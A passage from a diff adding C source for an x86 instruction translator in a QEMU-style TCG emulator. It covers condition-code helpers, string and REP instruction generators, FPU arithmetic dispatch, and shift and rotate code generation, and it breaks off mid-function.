s->uc->tcg_ctx; + + if (cc.no_setcond) { + if (cc.cond == TCG_COND_EQ) { + tcg_gen_xori_tl(tcg_ctx, reg, cc.reg, 1); + } else { + tcg_gen_mov_tl(tcg_ctx, reg, cc.reg); + } + return; + } + + if (cc.cond == TCG_COND_NE && !cc.use_reg2 && cc.imm == 0 && + cc.mask != 0 && (cc.mask & (cc.mask - 1)) == 0) { + tcg_gen_shri_tl(tcg_ctx, reg, cc.reg, ctztl(cc.mask)); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 1); + return; + } + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, reg, cc.reg, cc.mask); + cc.reg = reg; + } + if (cc.use_reg2) { + tcg_gen_setcond_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.reg2); + } else { + tcg_gen_setcondi_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.imm); + } +} + +static inline void gen_compute_eflags_c(DisasContext *s, TCGv reg) +{ + gen_setcc1(s, JCC_B << 1, reg); +} + +/* generate a conditional jump to label 'l1' according to jump opcode + value 'b'. In the fast case, T0 is guaranted not to be used. */ +static inline void gen_jcc1_noeob(DisasContext *s, int b, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + CCPrepare cc = gen_prepare_cc(s, b, *cpu_T[0]); + + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], cc.reg, cc.mask); + cc.reg = *cpu_T[0]; + } + if (cc.use_reg2) { + tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); + } else { + tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); + } +} + +/* Generate a conditional jump to label 'l1' according to jump opcode + value 'b'. In the fast case, T0 is guaranted not to be used. + A translation block must end soon. */ +static inline void gen_jcc1(DisasContext *s, int b, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + CCPrepare cc = gen_prepare_cc(s, b, *cpu_T[0]); + + gen_update_cc_op(s); + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], cc.reg, cc.mask); + cc.reg = *cpu_T[0]; + } + set_cc_op(s, CC_OP_DYNAMIC); + if (cc.use_reg2) { + tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); + } else { + tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); + } +} + +/* XXX: does not work with gdbstub "ice" single step - not a + serious problem */ +static int gen_jz_ecx_string(DisasContext *s, target_ulong next_eip) +{ + int l1, l2; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + gen_op_jnz_ecx(tcg_ctx, s->aflag, l1); + gen_set_label(tcg_ctx, l2); + gen_jmp_tb(s, next_eip, 1); + gen_set_label(tcg_ctx, l1); + return l2; +} + +static inline void gen_stos(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + gen_string_movl_A0_EDI(s); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_lods(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[0]); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); +} + +static inline void gen_scas(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_EDI(s); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_op(s, OP_CMPL, ot, R_EAX); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_cmps(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_EDI(s); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_string_movl_A0_ESI(s); + gen_op(s, OP_CMPL, ot, OR_TMP0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_ins(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_string_movl_A0_EDI(s); + /* Note: we must do this dummy write first to be restartable in + case of page fault. */ + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[R_EDX]); + tcg_gen_andi_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 0xffff); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[0], cpu_tmp2_i32); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_outs(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[R_EDX]); + tcg_gen_andi_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 0xffff); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[0]); + gen_helper_out_func(tcg_ctx, ot, cpu_tmp2_i32, cpu_tmp3_i32); + + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); +} + +/* same method as Valgrind : we generate jumps to current or next + instruction */ +#define GEN_REPZ(op) \ +static inline void gen_repz_ ## op(DisasContext *s, TCGMemOp ot, \ + target_ulong cur_eip, target_ulong next_eip) \ +{ \ + int l2;\ + gen_update_cc_op(s); \ + l2 = gen_jz_ecx_string(s, next_eip); \ + gen_ ## op(s, ot); \ + gen_op_add_reg_im(s->uc->tcg_ctx, s->aflag, R_ECX, -1); \ + /* a loop would cause two single step exceptions if ECX = 1 \ + before rep string_insn */ \ + if (!s->jmp_opt) \ + gen_op_jz_ecx(s->uc->tcg_ctx, s->aflag, l2); \ + gen_jmp(s, cur_eip); \ +} + +#define GEN_REPZ2(op) \ +static inline void gen_repz_ ## op(DisasContext *s, TCGMemOp ot, \ + target_ulong cur_eip, \ + target_ulong next_eip, \ + int nz) \ +{ \ + int l2;\ + gen_update_cc_op(s); \ + l2 = gen_jz_ecx_string(s, next_eip); \ + gen_ ## op(s, ot); \ + gen_op_add_reg_im(s->uc->tcg_ctx, s->aflag, R_ECX, -1); \ + gen_update_cc_op(s); \ + gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2); \ + if (!s->jmp_opt) \ + gen_op_jz_ecx(s->uc->tcg_ctx, s->aflag, l2); \ + gen_jmp(s, cur_eip); \ +} + +GEN_REPZ(movs) +GEN_REPZ(stos) +GEN_REPZ(lods) +GEN_REPZ(ins) +GEN_REPZ(outs) +GEN_REPZ2(scas) +GEN_REPZ2(cmps) + +static void gen_helper_fp_arith_ST0_FT0(TCGContext *s, int op) +{ + switch (op) { + case 0: + gen_helper_fadd_ST0_FT0(s, s->cpu_env); + break; + case 1: + gen_helper_fmul_ST0_FT0(s, s->cpu_env); + break; + case 2: + gen_helper_fcom_ST0_FT0(s, s->cpu_env); + break; + case 3: + gen_helper_fcom_ST0_FT0(s, s->cpu_env); + break; + case 4: + gen_helper_fsub_ST0_FT0(s, s->cpu_env); + break; + case 5: + gen_helper_fsubr_ST0_FT0(s, s->cpu_env); + break; + case 6: + gen_helper_fdiv_ST0_FT0(s, s->cpu_env); + break; + case 7: + gen_helper_fdivr_ST0_FT0(s, s->cpu_env); + break; + } +} + +/* NOTE the exception in "r" op ordering */ +static void gen_helper_fp_arith_STN_ST0(TCGContext *s, int op, int opreg) +{ + TCGv_i32 tmp = tcg_const_i32(s, opreg); + switch (op) { + case 0: + gen_helper_fadd_STN_ST0(s, s->cpu_env, tmp); + break; + case 1: + gen_helper_fmul_STN_ST0(s, s->cpu_env, tmp); + break; + case 4: + gen_helper_fsubr_STN_ST0(s, s->cpu_env, tmp); + break; + case 5: + gen_helper_fsub_STN_ST0(s, s->cpu_env, tmp); + break; + case 6: + gen_helper_fdivr_STN_ST0(s, s->cpu_env, tmp); + break; + case 7: + gen_helper_fdiv_STN_ST0(s, s->cpu_env, tmp); + break; + } +} + +/* if d == OR_TMP0, it means memory operand (address in A0) */ +static void gen_op(DisasContext *s, int op, TCGMemOp ot, int d) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d != OR_TMP0) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], d); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } + switch(op) { + case OP_ADCL: + gen_compute_eflags_c(s, cpu_tmp4); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp4); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update3_cc(tcg_ctx, cpu_tmp4); + set_cc_op(s, CC_OP_ADCB + ot); + break; + case OP_SBBL: + gen_compute_eflags_c(s, cpu_tmp4); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp4); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update3_cc(tcg_ctx, cpu_tmp4); + set_cc_op(s, CC_OP_SBBB + ot); + break; + case OP_ADDL: + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_ADDB + ot); + break; + case OP_SUBL: + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_SUBB + ot); + break; + default: + case OP_ANDL: + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_ORL: + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_XORL: + tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_CMPL: + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], *cpu_T[1]); + set_cc_op(s, CC_OP_SUBB + ot); + break; + } +} + +/* if d == OR_TMP0, it means memory operand (address in A0) */ +static void gen_inc(DisasContext *s, TCGMemOp ot, int d, int c) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d != OR_TMP0) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], d); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } + gen_compute_eflags_c(s, cpu_cc_src); + if (c > 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + set_cc_op(s, CC_OP_INCB + ot); + } else { + tcg_gen_addi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], -1); + set_cc_op(s, CC_OP_DECB + ot); + } + gen_op_st_rm_T0_A0(s, ot, d); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_shift_flags(DisasContext *s, TCGMemOp ot, TCGv result, + TCGv shm1, TCGv count, bool is_right) +{ + TCGv_i32 z32, s32, oldop; + TCGv z_tl; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + /* Store the results into the CC variables. If we know that the + variable must be dead, store unconditionally. Otherwise we'll + need to not disrupt the current contents. */ + z_tl = tcg_const_tl(tcg_ctx, 0); + if (cc_op_live[s->cc_op] & USES_CC_DST) { + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_cc_dst, count, z_tl, + result, cpu_cc_dst); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, result); + } + if (cc_op_live[s->cc_op] & USES_CC_SRC) { + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_cc_src, count, z_tl, + shm1, cpu_cc_src); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, shm1); + } + tcg_temp_free(tcg_ctx, z_tl); + + /* Get the two potential CC_OP values into temporaries. */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); + if (s->cc_op == CC_OP_DYNAMIC) { + oldop = cpu_cc_op; + } else { + tcg_gen_movi_i32(tcg_ctx, cpu_tmp3_i32, s->cc_op); + oldop = cpu_tmp3_i32; + } + + /* Conditionally store the CC_OP value. */ + z32 = tcg_const_i32(tcg_ctx, 0); + s32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, s32, count); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, cpu_cc_op, s32, z32, cpu_tmp2_i32, oldop); + tcg_temp_free_i32(tcg_ctx, z32); + tcg_temp_free_i32(tcg_ctx, s32); + + /* The CC_OP value is no longer predictable. */ + set_cc_op(s, CC_OP_DYNAMIC); +} + +static void gen_shift_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + int is_right, int is_arith) +{ + target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], mask); + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, *cpu_T[1], 1); + + if (is_right) { + if (is_arith) { + gen_exts(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_sar_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_sar_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + } else { + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + gen_shift_flags(s, ot, *cpu_T[0], cpu_tmp0, *cpu_T[1], is_right); +} + +static void gen_shift_rm_im(DisasContext *s, TCGMemOp ot, int op1, int op2, + int is_right, int is_arith) +{ + int mask = (ot == MO_64 ? 0x3f : 0x1f); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + else + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + + op2 &= mask; + if (op2 != 0) { + if (is_right) { + if (is_arith) { + gen_exts(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } else { + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shri_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + } else { + tcg_gen_shli_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_shli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + /* update eflags if non zero shift */ + if (op2 != 0) { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, cpu_tmp4); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); + } +} + +static void gen_rot_rm_T1(DisasContext *s, TCGMemOp ot, int op1, int is_right) +{ + target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); + TCGv_i32 t0, t1; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], mask); + + switch (ot) { + case MO_8: + /* Replicate the 8-bit input so that a 32-bit rotate works. */ + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_muli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0x01010101); + goto do_long; + case MO_16: + /* Replicate the 16-bit input so that a 32-bit rotate works. */ + tcg_gen_deposit_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[0], 16, 16); + goto do_long; + do_long: +#ifdef TARGET_X86_64 + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + if (is_right) { + tcg_gen_rotr_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + } else { + tcg_gen_rotl_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + } + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + break; +#endif + default: + if (is_right) { + tcg_gen_rotr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + tcg_gen_rotl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + break; + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + /* We'll need the flags computed into CC_SRC. */ + gen_compute_eflags(s); + + /* The value that was "rotated out" is now present at the other end + of the word. Compute C into CC_DST and O into CC_SRC2. Note that + since we've computed the flags into CC_SRC, these variables are + currently dead. */ + if (is_right) { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask - 1); + tcg_gen_shri_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, cpu_cc_dst, 1); + } else { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], 1); + } + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, 1); + tcg_gen_xor_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, cpu_cc_dst); + + /* Now conditionally store the new CC_OP value. If the shift count + is 0 we keep the CC_OP_EFLAGS setting so that only CC_SRC is live. + Otherwise reuse CC_OP_ADCOX which have the C and O flags split out + exactly as we computed above. */ + t0 = tcg_const_i32(tcg_ctx, 0); + t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t1, *cpu_T[1]); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, CC_OP_ADCOX); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp3_i32, CC_OP_EFLAGS); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, cpu_cc_op, t1, t0, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free_i32(tcg_ctx, t1); + + /* The CC_OP value is no longer predictable. */ + set_cc_op(s, CC_OP_DYNAMIC); +} + +static void gen_rot_rm_im(DisasContext *s, TCGMemOp ot, int op1, int op2, + int is_right) +{ + int mask = (ot == MO_64 ? 0x3f : 0x1f); + int shift; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + +#ifdef TARGET_X86_64 + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; +#endif + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + op2 &= mask; + if (op2 != 0) { + switch (ot) { +#ifdef TARGET_X86_64 + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + if (is_right) { + tcg_gen_rotri_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, op2); + } else { + tcg_gen_rotli_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, op2); + } + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + break; +#endif + default: + if (is_right) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } else { + tcg_gen_rotli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + break; + case MO_8: + mask = 7; + goto do_shifts; + case MO_16: + mask = 15; + do_shifts: + shift = op2 & mask; + if (is_right) { + shift = mask + 1 - shift; + } + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shli_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], shift); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], mask + 1 - shift); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + } + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + if (op2 != 0) { + /* Compute the flags into CC_SRC. */ + gen_compute_eflags(s); + + /* The value that was "rotated out" is now present at the other end + of the word. Compute C into CC_DST and O into CC_SRC2. Note that + since we've computed the flags into CC_SRC, these variables are + currently dead. */ + if (is_right) { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask - 1); + tcg_gen_shri_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, cpu_cc_dst, 1); + } else { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], 1); + } + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, 1); + tcg_gen_xor_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, cpu_cc_dst); + set_cc_op(s, CC_OP_ADCOX); + } +} + +/* XXX: add faster immediate = 1 case */ +static void gen_rotc_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + int is_right) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_compute_eflags(s); + assert(s->cc_op == CC_OP_EFLAGS); + + /* load */ + if (op1 == OR_TMP0) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + else + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + + if (is_right) { + switch (ot) { + case MO_8: + gen_helper_rcrb(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_16: + gen_helper_rcrw(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_32: + gen_helper_rcrl(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_helper_rcrq(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#endif + default: + tcg_abort(); + } + } else { + switch (ot) { + case MO_8: + gen_helper_rclb(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], 